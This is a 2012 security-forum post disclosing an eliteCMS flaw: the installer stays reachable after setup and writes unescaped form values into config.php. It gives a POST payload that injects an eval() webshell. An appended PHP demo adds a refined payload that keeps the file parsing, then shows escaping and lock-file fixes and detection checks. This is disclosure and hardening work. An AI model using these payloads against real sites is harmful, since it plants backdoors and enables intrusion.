中国网络渗透测试联盟

Title: eliteCMS installer not locked after installation + one-line webshell write vulnerability

Author: admin    Time: 2012-11-18 13:59
After the eliteCMS installer finishes, it is not locked, so an attacker can re-run the installation simply by visiting the installer URL.

The other vulnerability is that the installer can write a one-line webshell straight into admin/includes/config.php. Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
... (omitted) ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // the four session values come straight from the install form and are
    // interpolated into PHP source code without any escaping
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    // config.php is overwritten on every step-4 request; nothing checks
    // whether the installation has already been completed
    $writer = fopen($file, 'w');
...

Now look at this code:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are not validated at all. If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor is written to /admin/includes/config.php.
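The following is an added demonstration written for this page; it is not code from the post or from eliteCMS. It rebuilds the step-4 config writer quoted above as a function, feeds a DB_NAME payload through it, and asks PHP's own tokenizer and parser whether the written file would actually run: `eval` has to appear as a real T_EVAL token, and the file still has to parse, because a value that leaves `define("DB_NAME", "` unbalanced breaks config.php instead of planting a shell, so the injected string must first close the open quote and parenthesis. It also shows the two fixes the post implies: render values with `var_export()` so a value can never escape the string literal, and refuse to run step 4 once a lock file exists. The function names, the `installed.lock` file, the temp directory layout and the sample values are assumptions made for this demo.

```php
<?php
// Added example, not eliteCMS code. Function names, the lock-file name,
// the temp directory and the sample values below are assumptions for the demo.

/** Mirrors the installer: session values are interpolated into PHP source unescaped. */
function render_config_vulnerable(array $v): string
{
    $w  = "<?php\n";
    $w .= "define(\"DB_SERVER\", \"{$v['DB_SERVER']}\");\n";
    $w .= "define(\"DB_NAME\", \"{$v['DB_NAME']}\");\n";
    $w .= "define(\"DB_USER\", \"{$v['DB_USER']}\");\n";
    $w .= "define(\"DB_PASS\", \"{$v['DB_PASS']}\");\n";
    $w .= "?>\n";
    return $w;
}

/** Hardened: var_export() emits a single-quoted, escaped literal, so a value can
 *  neither terminate the string nor open a new <?php block. */
function render_config_safe(array $v): string
{
    $w = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $k) {
        if (!isset($v[$k]) || !is_string($v[$k])) {
            throw new InvalidArgumentException("missing or non-string $k");
        }
        $w .= 'define(' . var_export($k, true) . ', ' . var_export($v[$k], true) . ");\n";
    }
    return $w;
}

/** True if eval appears as an executable token (T_EVAL), not as text inside a string. */
function contains_live_eval(string $src): bool
{
    foreach (token_get_all($src) as $tok) {
        if (is_array($tok) && $tok[0] === T_EVAL) {
            return true;
        }
    }
    return false;
}

/** True if PHP's parser accepts the source; a file that fails here never runs at all. */
function parses(string $src): bool
{
    try {
        token_get_all($src, TOKEN_PARSE);
        return true;
    } catch (ParseError $e) {
        return false;
    }
}

/** Hardened step 4: refuse once the lock file exists, write atomically, then lock. */
function write_config_locked(string $file, string $lock, array $v): bool
{
    if (file_exists($lock)) {
        return false;                         // installer already ran: do not overwrite
    }
    $tmp = $file . '.tmp';
    if (file_put_contents($tmp, render_config_safe($v), LOCK_EX) === false || !rename($tmp, $file)) {
        throw new RuntimeException("cannot write $file");
    }
    file_put_contents($lock, date('c'), LOCK_EX);
    return true;
}

// Constructed input: the payload from the post, and a variant that first closes the
// quote and parenthesis of define("DB_NAME", " so the written file still parses.
$base = ['DB_SERVER' => 'localhost', 'DB_USER' => 'root', 'DB_PASS' => 'secret'];
$payloads = [
    'as posted' => '"?><?php eval($_POST[c]);?><?php',
    'balanced'  => '");?><?php eval($_POST["c"]);?><?php define("X", "',
];
foreach ($payloads as $label => $p) {
    $vuln = render_config_vulnerable($base + ['DB_NAME' => $p]);
    $safe = render_config_safe($base + ['DB_NAME' => $p]);
    printf("%-9s vulnerable: eval=%d parses=%d | hardened: eval=%d parses=%d\n", $label,
        contains_live_eval($vuln), parses($vuln), contains_live_eval($safe), parses($safe));
}

// Lock-file check: the second run must be refused instead of rewriting config.php.
$dir = sys_get_temp_dir() . '/elitecms_demo_' . getmypid();
mkdir($dir);
$first = write_config_locked("$dir/config.php", "$dir/installed.lock", $base + ['DB_NAME' => 'cms']);
$again = write_config_locked("$dir/config.php", "$dir/installed.lock", $base + ['DB_NAME' => 'cms']);
printf("first install=%d, re-run=%d\n", $first, $again);
```

Run it with `php demo.php` (PHP 7 or later, for TOKEN_PARSE and ParseError). The vulnerable renderer reports a live eval token for both payloads, but only the balanced one produces a file that parses; the hardened renderer never yields a live eval, and the second call to `write_config_locked()` is refused because the lock file already exists. Checking the real target is the same idea in reverse: fetch the installer URL and see whether step 4 still answers, and grep config.php for an `eval` that sits outside a string literal.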

Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2